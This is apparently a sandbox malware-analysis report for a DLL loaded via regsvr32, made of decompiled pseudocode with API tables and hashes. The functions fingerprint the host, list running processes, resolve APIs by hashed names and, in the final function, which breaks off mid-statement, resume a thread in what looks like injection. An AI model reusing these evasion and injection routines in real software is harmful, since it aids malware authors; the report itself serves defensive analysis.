				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E10008FD8(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E1000D400(_t43, E1000C379(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E1000B88A(_t108, _t44, _t241);
				_t199 = GetCurrentProcess(); // executed
				_t111 = E1000BBDF(_t110); // executed
				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x1001e684; // 0x19afaa0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E100095E1(_t199, 0x10c);
				_t200 =  *0x1001e684; // 0x19afaa0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x1001e684; // 0x19afaa0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E100085D5( &_v8);
				_t124 =  *0x1001e684; // 0x19afaa0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E10009640(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x1001e684; // 0x19afaa0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x1001e684; // 0x19afaa0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x1001e684; // 0x19afaa0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x1001e684; // 0x19afaa0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x1001e684; // 0x19afaa0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x1001e684; // 0x19afaa0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E10012301(E1000D400(_t75, E1000C379(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E100122D3( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E1000902D(1, _t79, 0x14, 0x1e,  &_v2680);
				_t145 = E1000CD33(_t79); // executed
				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
				return _t222;
			}






















































                            0x1000d01f
                            0x1000d029
                            0x1000d035
                            0x1000d03a
                            0x1000d03f
                            0x1000d3ff
                            0x1000d3ff
                            0x1000d04c
                            0x1000d052
                            0x1000d057
                            0x1000d05d
                            0x1000d06d
                            0x1000d079
                            0x1000d079
                            0x1000d082
                            0x1000d088
                            0x1000d08a
                            0x1000d093
                            0x1000d093
                            0x1000d09f
                            0x1000d0a3
                            0x1000d0a8
                            0x1000d0ae
                            0x1000d0b7
                            0x1000d0c5
                            0x1000d0cc
                            0x1000d0d1
                            0x1000d0d1
                            0x1000d0d2
                            0x1000d0b9
                            0x1000d0b9
                            0x1000d0b9
                            0x1000d0d8
                            0x1000d0de
                            0x1000d0e3
                            0x1000d0e9
                            0x1000d0f1
                            0x1000d0fb
                            0x1000d108
                            0x1000d113
                            0x1000d11b
                            0x1000d13c
                            0x1000d13e
                            0x1000d13e
                            0x1000d140
                            0x1000d14a
                            0x1000d156
                            0x1000d166
                            0x1000d16c
                            0x1000d172
                            0x1000d174
                            0x1000d185
                            0x1000d18b
                            0x1000d191
                            0x1000d196
                            0x1000d19c
                            0x1000d1a2
                            0x1000d1a7
                            0x1000d1ac
                            0x1000d1ac
                            0x1000d1b2
                            0x1000d1b2
                            0x1000d1bb
                            0x1000d1c7
                            0x1000d1cf
                            0x1000d1d3
                            0x1000d1d3
                            0x1000d1cf
                            0x1000d1d7
                            0x1000d1dd
                            0x1000d1e3
                            0x1000d1ea
                            0x1000d1fb
                            0x1000d201
                            0x1000d209
                            0x1000d210
                            0x1000d212
                            0x1000d223
                            0x1000d229
                            0x1000d22e
                            0x1000d231
                            0x1000d234
                            0x1000d23a
                            0x1000d240
                            0x1000d242
                            0x1000d248
                            0x1000d251
                            0x1000d254
                            0x1000d254
                            0x1000d257
                            0x1000d25f
                            0x1000d26a
                            0x1000d270
                            0x1000d261
                            0x1000d263
                            0x1000d263
                            0x1000d279
                            0x1000d279
                            0x1000d27f
                            0x1000d287
                            0x1000d292
                            0x1000d297
                            0x1000d29d
                            0x1000d29f
                            0x1000d2ac
                            0x1000d2ad
                            0x1000d2ae
                            0x1000d2b9
                            0x1000d2bb
                            0x1000d2c2
                            0x1000d2c2
                            0x1000d2cc
                            0x1000d2d1
                            0x1000d2d6
                            0x1000d2d6
                            0x1000d2dc
                            0x1000d2e3
                            0x1000d2e4
                            0x1000d2f1
                            0x1000d304
                            0x1000d309
                            0x1000d30e
                            0x1000d317
                            0x1000d317
                            0x1000d31d
                            0x1000d322
                            0x1000d328
                            0x1000d32e
                            0x1000d333
                            0x1000d33c
                            0x1000d33e
                            0x1000d345
                            0x1000d345
                            0x1000d34b
                            0x1000d353
                            0x1000d358
                            0x1000d359
                            0x1000d35e
                            0x1000d367
                            0x1000d369
                            0x1000d374
                            0x1000d374
                            0x1000d37d
                            0x1000d385
                            0x1000d38c
                            0x1000d391
                            0x1000d3a0
                            0x1000d3b8
                            0x1000d3bf
                            0x1000d3cd
                            0x1000d3df
                            0x1000d3e6
                            0x1000d3ee
                            0x1000d3f3
                            0x00000000

                            APIs
                              • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                            • GetCurrentProcessId.KERNEL32 ref: 1000D046
                            • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 1000D082
                            • GetCurrentProcess.KERNEL32 ref: 1000D09F
                            • LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 1000D131
                            • GetLastError.KERNEL32 ref: 1000D13E
                            • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 1000D16C
                            • GetLastError.KERNEL32 ref: 1000D172
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 1000D1C7
                            • GetCurrentProcess.KERNEL32 ref: 1000D20E
                            • memset.MSVCRT ref: 1000D229
                            • GetVersionExA.KERNEL32(00000000), ref: 1000D234
                            • GetCurrentProcess.KERNEL32(00000100), ref: 1000D24E
                            • GetSystemInfo.KERNEL32(?), ref: 1000D26A
                            • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 1000D287
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess$ErrorFileLastModuleName$AccountAllocByteCharDirectoryHeapInfoLookupMultiSystemVersionWideWindowsmemset
                            • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                            • API String ID: 1775177207-2706916422
                            • Opcode ID: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
                            • Instruction ID: b43297c2b7e84521e640d7514395b2e770dddaaf3bf4c430bd1fb4440b0adffa
                            • Opcode Fuzzy Hash: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
                            • Instruction Fuzzy Hash: 7AB14875600709ABE714EB70CC89FEE77E8EF18380F01486EF55AD7195EB70AA448B21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 10005F82, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 104threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 82%
                            			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				long _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				void* _t38;
				void* _t49;
				struct _SECURITY_ATTRIBUTES* _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq"); // executed
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E100085EF();
				_t19 = E1000980C( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E10008F78();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0x1001e69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E100095C7(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E100085C2( &_a8);
							_t53 =  &(_t53->nLength);
						} while (_t53 < 0x2710);
						E10012A5B( *0x1001e69c);
						 *_t55 = 0x7c3;
						 *0x1001e684 = E1000E1BC(0x1001ba28, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E100095E1(0x1001ba28);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32); // executed
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E100085D5();
							_v8 = 0;
							_t38 = CreateThread(0, 0, E10005E06, 0, 0,  &_v8);
							 *0x1001e6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E100085D5();
					}
					goto L10;
				}
			}




















                            0x10005f82
                            0x10005f92
                            0x10005f9c
                            0x100060d0
                            0x100060c3
                            0x00000000
                            0x100060c5
                            0x100060d7
                            0x10006098
                            0x00000000
                            0x10006098
                            0x10005fa2
                            0x10005faa
                            0x10005fb1
                            0x10005fb3
                            0x00000000
                            0x10005fc6
                            0x10005fc6
                            0x10005fcc
                            0x10005fd2
                            0x10005fe2
                            0x10005fe7
                            0x10005fef
                            0x10005ff7
                            0x10006013
                            0x10006018
                            0x1000601b
                            0x1000601d
                            0x1000601f
                            0x1000602c
                            0x10006035
                            0x1000603e
                            0x10006043
                            0x10006044
                            0x10006052
                            0x1000605c
                            0x1000606d
                            0x10006072
                            0x10006079
                            0x10006080
                            0x10006083
                            0x1000608f
                            0x10006090
                            0x1000609c
                            0x100060a5
                            0x100060b7
                            0x100060ba
                            0x100060c1
                            0x00000000
                            0x00000000
                            0x00000000
                            0x100060c1
                            0x10006092
                            0x10006097
                            0x00000000
                            0x10005ff7

                            APIs
                            • OutputDebugStringA.KERNEL32(Hello qqq), ref: 10005F92
                            • SetLastError.KERNEL32(000000AA), ref: 100060D7
                              • Part of subcall function 100085EF: HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8
                              • Part of subcall function 1000980C: GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
                              • Part of subcall function 1000980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839
                            • GetModuleHandleA.KERNEL32(00000000), ref: 10005FCC
                            • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 10005FE7
                            • GetLastError.KERNEL32 ref: 10005FEF
                            • memset.MSVCRT ref: 10006013
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 10006035
                            • GetFileAttributesW.KERNEL32(00000000), ref: 10006083
                            • CreateThread.KERNEL32(00000000,00000000,10005E06,00000000,00000000,?), ref: 100060B7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CreateErrorLastModuleTime$AttributesByteCharDebugHandleHeapMultiNameOutputStringSystemThreadUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                            • String ID: Hello qqq
                            • API String ID: 3435743081-3610097158
                            • Opcode ID: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
                            • Instruction ID: 5d240a4b5adc479b0f810b05b199863bf69006de757f0dcc77d76d9ad36975de
                            • Opcode Fuzzy Hash: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
                            • Instruction Fuzzy Hash: 8C31E574900654ABF754DB30CC89E6F37A9EF893A0F20C229F855C6195DB34EB49CB21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000B7A8, Relevance: 9.1, APIs: 6, Instructions: 83stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 94%
                            			E1000B7A8(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				GetComputerNameW( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E100095E1(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E100085D5( &_v16);
				_t33 = E1000C392(_t43);
				E10009640( &(_t43[E1000C392(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E1000C392(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E1000D400(_t43, E1000C392(_t43) + _t40, 0);
			}















                            0x1000b7a8
                            0x1000b7b1
                            0x1000b7bd
                            0x1000b7c3
                            0x1000b7c5
                            0x1000b7cd
                            0x1000b7e0
                            0x1000b7ef
                            0x1000b7fa
                            0x1000b807
                            0x1000b821
                            0x1000b826
                            0x1000b828
                            0x1000b82f
                            0x1000b83f
                            0x1000b850
                            0x1000b85a
                            0x1000b862
                            0x1000b869
                            0x1000b86c
                            0x1000b889

                            APIs
                            • memset.MSVCRT ref: 1000B7C5
                            • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 1000B7E0
                            • lstrcpynW.KERNEL32(?,?,00000100), ref: 1000B7EF
                            • GetVolumeInformationW.KERNEL32(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000B821
                              • Part of subcall function 10009640: _vsnwprintf.MSVCRT ref: 1000965D
                            • lstrcatW.KERNEL32 ref: 1000B85A
                            • CharUpperBuffW.USER32(?,00000000), ref: 1000B86C
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
                            • String ID:
                            • API String ID: 3410906232-0
                            • Opcode ID: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
                            • Instruction ID: 180e092026911c17520c8b5fa365ce7934641c9957428f094d539ad927535ab9
                            • Opcode Fuzzy Hash: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
                            • Instruction Fuzzy Hash: 9C2171B6900218BFE714DBA4CC8AFAF77BCEB44250F108169F505D6185EA75AF448B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000ABA3, Relevance: 7.6, APIs: 5, Instructions: 65processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 187 1000aba3-1000abc7 CreateToolhelp32Snapshot 188 1000ac38-1000ac3e 187->188 189 1000abc9-1000abf2 memset Process32First 187->189 190 1000ac02-1000ac13 call 1000ccc0 189->190 191 1000abf4-1000ac00 189->191 195 1000ac15-1000ac26 Process32Next 190->195 196 1000ac28-1000ac35 CloseHandle 190->196 191->188 195->190 195->196 196->188
                            C-Code - Quality: 100%
                            			E1000ABA3(intOrPtr __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				signed int _t14;
				signed int _t15;
				void* _t22;
				intOrPtr _t28;
				void* _t31;
				intOrPtr _t33;
				void* _t40;
				void* _t42;

				_t33 = __ecx;
				_t31 = __edx; // executed
				_t14 = CreateToolhelp32Snapshot(2, 0);
				_t42 = _t14;
				_t15 = _t14 | 0xffffffff;
				if(_t42 != _t15) {
					memset( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t42,  &_v304) != 0) {
						while(1) {
							_t22 = E1000CCC0(_t33,  &_v308, _t31); // executed
							_t40 = _t22;
							if(_t40 == 0) {
								break;
							}
							_t33 =  *0x1001e684; // 0x19afaa0
							if(Process32Next(_t42,  &_v308) != 0) {
								continue;
							}
							break;
						}
						CloseHandle(_t42);
						_t15 = 0 | _t40 == 0x00000000;
					} else {
						_t28 =  *0x1001e684; // 0x19afaa0
						 *((intOrPtr*)(_t28 + 0x30))(_t42);
						_t15 = 0xfffffffe;
					}
				}
				return _t15;
			}













                            0x1000aba3
                            0x1000abbb
                            0x1000abbd
                            0x1000abc0
                            0x1000abc2
                            0x1000abc7
                            0x1000abd6
                            0x1000abde
                            0x1000abf2
                            0x1000ac02
                            0x1000ac08
                            0x1000ac0d
                            0x1000ac13
                            0x00000000
                            0x00000000
                            0x1000ac15
                            0x1000ac26
                            0x00000000
                            0x00000000
                            0x00000000
                            0x1000ac26
                            0x1000ac2e
                            0x1000ac35
                            0x1000abf4
                            0x1000abf4
                            0x1000abfa
                            0x1000abff
                            0x1000abff
                            0x1000abf2
                            0x1000ac3e

                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 1000ABBD
                            • memset.MSVCRT ref: 1000ABD6
                            • Process32First.KERNEL32(00000000,?), ref: 1000ABED
                            • Process32Next.KERNEL32(00000000,?), ref: 1000AC21
                            • CloseHandle.KERNEL32(00000000), ref: 1000AC2E
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32memset
                            • String ID:
                            • API String ID: 1267121359-0
                            • Opcode ID: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
                            • Instruction ID: 824b075522648d78722121d86b555edf1df252a9305654497386a44dc5d3d608
                            • Opcode Fuzzy Hash: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
                            • Instruction Fuzzy Hash: B11191732043556BF710DB68DC89E9F37ECEB863A0F560A29F624CB181EB30D9058762
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000DFAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 197 1000dfad-1000dfc4 198 1000e021 197->198 199 1000dfc6-1000dfee 197->199 200 1000e023-1000e027 198->200 199->198 201 1000dff0-1000e013 call 1000c379 call 1000d400 199->201 206 1000e015-1000e01f 201->206 207 1000e028-1000e03f 201->207 206->198 206->201 208 1000e041-1000e049 207->208 209 1000e095-1000e097 207->209 208->209 210 1000e04b 208->210 209->200 211 1000e04d-1000e053 210->211 212 1000e063-1000e074 211->212 213 1000e055-1000e057 211->213 215 1000e076-1000e077 212->215 216 1000e079-1000e085 LoadLibraryA 212->216 213->212 214 1000e059-1000e061 213->214 214->211 214->212 215->216 216->198 217 1000e087-1000e091 GetProcAddress 216->217 217->198 218 1000e093 217->218 218->200
                            C-Code - Quality: 100%
                            			E1000DFAD(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E1000D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























                            0x1000dfb6
                            0x1000dfb8
                            0x1000dfbb
                            0x1000dfbe
                            0x1000dfc4
                            0x1000e021
                            0x00000000
                            0x1000e021
                            0x1000dfc6
                            0x1000dfd1
                            0x1000dfd4
                            0x1000dfd9
                            0x1000dfde
                            0x1000dfe1
                            0x1000dfe3
                            0x1000dfe6
                            0x1000dfe9
                            0x1000dfee
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x1000dff0
                            0x1000dff0
                            0x1000e002
                            0x1000e00f
                            0x1000e013
                            0x00000000
                            0x00000000
                            0x1000e015
                            0x1000e018
                            0x1000e019
                            0x1000e01f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x1000e01f
                            0x1000e036
                            0x1000e03b
                            0x1000e03f
                            0x00000000
                            0x1000e04b
                            0x1000e04b
                            0x1000e04d
                            0x1000e04d
                            0x1000e053
                            0x00000000
                            0x00000000
                            0x1000e059
                            0x1000e05d
                            0x1000e061
                            0x00000000
                            0x00000000
                            0x00000000
                            0x1000e061
                            0x1000e067
                            0x1000e06f
                            0x1000e074
                            0x1000e077
                            0x1000e077
                            0x1000e079
                            0x1000e07d
                            0x1000e085
                            0x00000000
                            0x00000000
                            0x1000e089
                            0x1000e091
                            0x00000000
                            0x00000000
                            0x00000000
                            0x1000e091

                            APIs
                            • LoadLibraryA.KERNEL32(.dll), ref: 1000E07D
                            • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 1000E089
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: .dll
                            • API String ID: 2574300362-2738580789
                            • Opcode ID: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
                            • Instruction ID: 6da95daea6e89431fe10e6910c52a9851ea62cfcad36df982cd2ab94b172e300
                            • Opcode Fuzzy Hash: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
                            • Instruction Fuzzy Hash: F631E431A002998BEB54CFA9C8847AEBBF5EF44384F24446DD905E7349D770ED81C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000CA25, Relevance: 4.6, APIs: 3, Instructions: 120threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 430 1000ca25-1000ca45 call 1000c8fd 433 1000cb73-1000cb76 430->433 434 1000ca4b-1000ca6c call 1000a86d 430->434 437 1000ca72-1000ca74 434->437 438 1000cb63-1000cb72 call 1000861a 434->438 439 1000cb51-1000cb61 call 1000861a 437->439 440 1000ca7a 437->440 438->433 439->438 443 1000ca7d-1000ca7f 440->443 446 1000cb42-1000cb4b 443->446 447 1000ca85-1000ca9b call 1000ae66 443->447 446->437 446->439 450 1000cb00-1000cb04 447->450 451 1000ca9d-1000cab0 call 1000cb77 447->451 452 1000cb06-1000cb08 450->452 453 1000cb2f-1000cb3c 450->453 451->450 458 1000cab2-1000caca 451->458 455 1000cb19-1000cb29 452->455 456 1000cb0a-1000cb10 452->456 453->443 453->446 455->453 456->455 458->450 461 1000cacc-1000cae7 GetLastError ResumeThread 458->461 462 1000cae9-1000caf4 461->462 463 1000cafc-1000cafd CloseHandle 461->463 465 1000caf6 462->465 466 1000caf7 462->466 463->450 465->466 466->463
                            C-Code - Quality: 89%
                            			E1000CA25(intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t54;
				intOrPtr _t57;
				long _t61;
				intOrPtr _t62;
				signed int _t65;
				signed int _t68;
				signed int _t82;
				void* _t85;
				char _t86;

				_v8 = _v8 & 0x00000000;
				_v20 = __edx;
				_t65 = 0;
				_t37 = E1000C8FD( &_v8);
				_t86 = _t37;
				_v24 = _t86;
				_t87 = _t86;
				if(_t86 == 0) {
					return _t37;
				}
				_t38 =  *0x1001e688; // 0x1930590
				E1000A86D( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t87);
				_t82 = _v8;
				_t68 = 0;
				_v16 = 0;
				if(_t82 == 0) {
					L20:
					E1000861A( &_v24, 0);
					return _t65;
				}
				while(_t65 == 0) {
					while(_t65 == 0) {
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t45 = E1000AE66( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
						_t92 = _t45;
						if(_t45 >= 0) {
							_t54 = E1000CB77(E10005CEC,  &_v40, _t92, _v20); // executed
							if(_t54 != 0) {
								_t57 =  *0x1001e684; // 0x19afaa0
								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
								if(_t85 != 0) {
									GetLastError();
									_t61 = ResumeThread(_v36);
									_t62 =  *0x1001e684; // 0x19afaa0
